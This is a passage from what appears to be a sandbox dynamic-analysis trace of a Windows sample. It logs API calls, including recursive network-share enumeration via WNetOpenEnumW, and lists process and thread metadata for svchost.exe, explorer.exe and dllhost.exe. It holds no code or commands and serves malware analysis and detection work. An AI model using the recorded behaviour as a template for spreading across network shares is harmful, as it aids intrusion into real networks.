lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfeca8830, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.333] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bf70 | out: hHeap=0x2c0000) returned 1 [0207.333] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67160 | out: hHeap=0x2c0000) returned 1 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67c40 | out: hHeap=0x2c0000) returned 1 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67b58 | out: hHeap=0x2c0000) returned 1 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67a70 | out: hHeap=0x2c0000) returned 1 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67418 | out: hHeap=0x2c0000) returned 1 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b676d0 | out: hHeap=0x2c0000) returned 1 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77d08 | out: hHeap=0x2c0000) returned 1 [0207.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77df0 | out: hHeap=0x2c0000) returned 1 [0207.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77ed8 | out: hHeap=0x2c0000) returned 1 [0207.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77fc0 | out: hHeap=0x2c0000) returned 1 [0207.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b780a8 | out: hHeap=0x2c0000) returned 1 [0207.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b78190 | out: hHeap=0x2c0000) returned 1 [0207.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6be20 | out: hHeap=0x2c0000) returned 1 [0207.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0207.334] SendMessageW (hWnd=0x20148, Msg=0x8003, wParam=0x0, lParam=0x0) returned 0x0 [0207.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3760 | out: hHeap=0x2c0000) returned 1 [0207.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32da630 | out: hHeap=0x2c0000) returned 1 Thread: id = 296 os_tid = 0x620 [0198.963] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x3b0fee0 | out: lphEnum=0x3b0fee0*=0x32ef1b8) returned 0x0 [0199.512] WNetEnumResourceW (in: hEnum=0x32ef1b8, lpcCount=0x3b0fedc, lpBuffer=0x336a4c0, lpBufferSize=0x3b0fed8 | out: lpcCount=0x3b0fedc, lpBuffer=0x336a4c0, lpBufferSize=0x3b0fed8) returned 0x0 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cea20 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cea68 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b98 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceab0 [0199.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceaf8 [0199.512] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x336a4c0, lphEnum=0x3b0fe28 | out: lphEnum=0x3b0fe28*=0x2e66b8) returned 0x0 [0199.583] WNetEnumResourceW (in: hEnum=0x2e66b8, lpcCount=0x3b0fe24, lpBuffer=0x3b10048, lpBufferSize=0x3b0fe20 | out: lpcCount=0x3b0fe24, lpBuffer=0x3b10048, lpBufferSize=0x3b0fe20) returned 0x103 [0199.583] WNetCloseEnum (hEnum=0x2e66b8) returned 0x0 [0199.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cea68 | out: hHeap=0x2c0000) returned 1 [0199.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cea20 | out: hHeap=0x2c0000) returned 1 [0199.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cea20 [0199.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cea68 [0199.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3160d0 [0199.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ce240 [0199.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceb88 [0199.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ceaf8 | out: hHeap=0x2c0000) returned 1 [0199.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ceab0 | out: hHeap=0x2c0000) returned 1 [0199.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b98 | out: hHeap=0x2c0000) returned 1 [0199.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceab0 [0199.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ceaf8 [0199.583] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x336a4e0, lphEnum=0x3b0fe28 | out: lphEnum=0x3b0fe28*=0x3b0fe44) returned 0x4b8 [0213.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cea68 | out: hHeap=0x2c0000) returned 1 [0213.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cea20 | out: hHeap=0x2c0000) returned 1 [0213.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0213.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0213.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x3294350 [0213.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cea20 [0213.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cea68 [0213.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ce708 [0213.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87718 [0213.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ceb88 | out: hHeap=0x2c0000) returned 1 [0213.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ce240 | out: hHeap=0x2c0000) returned 1 [0213.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ceaf8 | out: hHeap=0x2c0000) returned 1 [0213.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ceab0 | out: hHeap=0x2c0000) returned 1 [0213.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3160d0 | out: hHeap=0x2c0000) returned 1 [0213.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0213.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0218 [0213.695] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x336a500, lphEnum=0x3b0fe28 | out: lphEnum=0x3b0fe28*=0x3b0fe44) returned 0x4c6 [0213.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0213.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0213.698] WNetEnumResourceW (in: hEnum=0x32ef1b8, lpcCount=0x3b0fedc, lpBuffer=0x336a4c0, lpBufferSize=0x3b0fed8 | out: lpcCount=0x3b0fedc, lpBuffer=0x336a4c0, lpBufferSize=0x3b0fed8) returned 0x103 [0213.698] WNetCloseEnum (hEnum=0x32ef1b8) returned 0x0 [0213.698] SendMessageW (hWnd=0x20148, Msg=0x8004, wParam=0x0, lParam=0x0) returned 0x0 Thread: id = 316 os_tid = 0x698 Thread: id = 318 os_tid = 0x678 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6843000" os_pid = "0xf0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e484" [0xc000000f], "LOCAL" [0x7] Thread: id = 185 os_tid = 0x7d4 Thread: id = 186 os_tid = 0x79c Thread: id = 187 os_tid = 0x794 Thread: id = 188 os_tid = 0x5b8 Thread: id = 189 os_tid = 0x5b4 Thread: id = 190 os_tid = 0x178 Thread: id = 191 os_tid = 0x144 Thread: id = 192 os_tid = 0x150 Thread: id = 193 os_tid = 0x12c Thread: id = 194 os_tid = 0x11c Thread: id = 195 os_tid = 0x118 Thread: id = 228 os_tid = 0x7ec Thread: id = 229 os_tid = 0x410 Thread: id = 230 os_tid = 0x488 Thread: id = 231 os_tid = 0x404 Thread: id = 233 os_tid = 0x4e0 Thread: id = 317 os_tid = 0x680 Thread: id = 319 os_tid = 0x788 Process: id = "13" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x63e8000" os_pid = "0x37c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x13c" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e979" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 196 os_tid = 0x690 Thread: id = 197 os_tid = 0x688 Thread: id = 198 os_tid = 0x66c Thread: id = 199 os_tid = 0x660 Thread: id = 200 os_tid = 0x65c Thread: id = 201 os_tid = 0x63c Thread: id = 202 os_tid = 0x5e8 Thread: id = 203 os_tid = 0x5e4 Thread: id = 204 os_tid = 0x5c4 Thread: id = 205 os_tid = 0x5c0 Thread: id = 206 os_tid = 0x5bc Thread: id = 207 os_tid = 0x51c Thread: id = 208 os_tid = 0x4f4 Thread: id = 209 os_tid = 0x4ec Thread: id = 210 os_tid = 0x4c4 Thread: id = 211 os_tid = 0x4c0 Thread: id = 212 os_tid = 0x4bc Thread: id = 213 os_tid = 0x4b8 Thread: id = 214 os_tid = 0x4a8 Thread: id = 215 os_tid = 0x4a4 Thread: id = 216 os_tid = 0x4a0 Thread: id = 217 os_tid = 0x49c Thread: id = 218 os_tid = 0x484 Thread: id = 219 os_tid = 0x404 Thread: id = 220 os_tid = 0x154 Thread: id = 221 os_tid = 0x294 Thread: id = 222 os_tid = 0x174 Thread: id = 223 os_tid = 0x148 Thread: id = 224 os_tid = 0x18c Thread: id = 225 os_tid = 0x3d8 Thread: id = 226 os_tid = 0x3a8 Thread: id = 227 os_tid = 0x3a4 Thread: id = 232 os_tid = 0x4b4 Thread: id = 234 os_tid = 0x268 Thread: id = 235 os_tid = 0x520 Thread: id = 236 os_tid = 0x134 Thread: id = 320 os_tid = 0x6d4 Thread: id = 323 os_tid = 0x490 Process: id = "14" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x6f177000" os_pid = "0x4cc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x254" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e979" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 237 os_tid = 0x21c Thread: id = 238 os_tid = 0x130 Thread: id = 239 os_tid = 0x218 Thread: id = 240 os_tid = 0x230 Thread: id = 241 os_tid = 0x1d8 Thread: id = 242 os_tid = 0x444 Thread: id = 243 os_tid = 0x4c8 Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x24933000" os_pid = "0x374" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d513" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 246 os_tid = 0x4a4 Thread: id = 247 os_tid = 0x4ac Thread: id = 248 os_tid = 0x42c Thread: id = 249 os_tid = 0x464 Thread: id = 250 os_tid = 0x480 Thread: id = 251 os_tid = 0x46c Thread: id = 252 os_tid = 0x430 Thread: id = 253 os_tid = 0x7fc Thread: id = 254 os_tid = 0x7f8 Thread: id = 255 os_tid = 0x7f0 Thread: id = 256 os_tid = 0x7a4 Thread: id = 257 os_tid = 0x7a0 Thread: id = 258 os_tid = 0x798 Thread: id = 259 os_tid = 0x790 Thread: id = 260 os_tid = 0x784 Thread: id = 261 os_tid = 0x780 Thread: id = 262 os_tid = 0x778 Thread: id = 263 os_tid = 0x76c Thread: id = 264 os_tid = 0x764 Thread: id = 265 os_tid = 0x75c Thread: id = 266 os_tid = 0x758 Thread: id = 267 os_tid = 0x74c Thread: id = 268 os_tid = 0x744 Thread: id = 269 os_tid = 0x740 Thread: id = 270 os_tid = 0x738 Thread: id = 271 os_tid = 0x734 Thread: id = 272 os_tid = 0x730 Thread: id = 273 os_tid = 0x724 Thread: id = 274 os_tid = 0x714 Thread: id = 275 os_tid = 0x54c Thread: id = 276 os_tid = 0x438 Thread: id = 277 os_tid = 0x43c Thread: id = 278 os_tid = 0x4e4 Thread: id = 279 os_tid = 0x4b0 Thread: id = 280 os_tid = 0x498 Thread: id = 281 os_tid = 0x494 Thread: id = 282 os_tid = 0x48c Thread: id = 283 os_tid = 0x1c4 Thread: id = 284 os_tid = 0x120 Thread: id = 285 os_tid = 0xc8 Thread: id = 286 os_tid = 0x3f8 Thread: id = 287 os_tid = 0x3ec Thread: id = 288 os_tid = 0x3a0 Thread: id = 289 os_tid = 0x39c Thread: id = 290 os_tid = 0x398 Thread: id = 291 os_tid = 0x394 Thread: id = 292 os_tid = 0x380 Thread: id = 293 os_tid = 0x378 Thread: id = 304 os_tid = 0x6b4 Thread: id = 305 os_tid = 0x6b8 Thread: id = 306 os_tid = 0x6c0 Thread: id = 307 os_tid = 0x608 Thread: id = 308 os_tid = 0x60c Thread: id = 309 os_tid = 0x6fc Thread: id = 310 os_tid = 0x6f8 Thread: id = 311 os_tid = 0x704 Thread: id = 312 os_tid = 0x710 Thread: id = 313 os_tid = 0x73c Thread: id = 314 os_tid = 0x69c Thread: id = 315 os_tid = 0x77c Thread: id = 321 os_tid = 0x3d8 Thread: id = 322 os_tid = 0x4e0 Thread: id = 324 os_tid = 0x324 Thread: id = 325 os_tid = 0x32c Thread: id = 326 os_tid = 0x630 Thread: id = 327 os_tid = 0x67c Thread: id = 328 os_tid = 0x330 Thread: id = 329 os_tid = 0x320 Thread: id = 330 os_tid = 0x534 Thread: id = 331 os_tid = 0x344 Thread: id = 353 os_tid = 0x3b8 Thread: id = 354 os_tid = 0x6cc Process: id = "16" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x67384000" os_pid = "0x344" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x254" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e979" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 297 os_tid = 0x34c Thread: id = 298 os_tid = 0x348 Thread: id = 299 os_tid = 0x324 Thread: id = 300 os_tid = 0x67c Thread: id = 301 os_tid = 0x630 Thread: id = 302 os_tid = 0x32c Thread: id = 303 os_tid = 0x330 Process: id = "17" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad24000" os_pid = "0x2cc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bd8e" [0xc000000f], "LOCAL" [0x7] Thread: id = 332 os_tid = 0x598 Thread: id = 333 os_tid = 0x348 Thread: id = 334 os_tid = 0x6c4 Thread: id = 335 os_tid = 0x5a4 Thread: id = 336 os_tid = 0x6a8 Thread: id = 337 os_tid = 0x618 Thread: id = 338 os_tid = 0x614 Thread: id = 339 os_tid = 0x610 Thread: id = 340 os_tid = 0x458 Thread: id = 341 os_tid = 0x448 Thread: id = 342 os_tid = 0x434 Thread: id = 343 os_tid = 0x41c Thread: id = 344 os_tid = 0x3c4 Thread: id = 345 os_tid = 0x3bc Thread: id = 346 os_tid = 0x3ac Thread: id = 347 os_tid = 0x300 Thread: id = 348 os_tid = 0x2fc Thread: id = 349 os_tid = 0x2e8 Thread: id = 350 os_tid = 0x2d8 Thread: id = 351 os_tid = 0x2d0 Thread: id = 352 os_tid = 0x310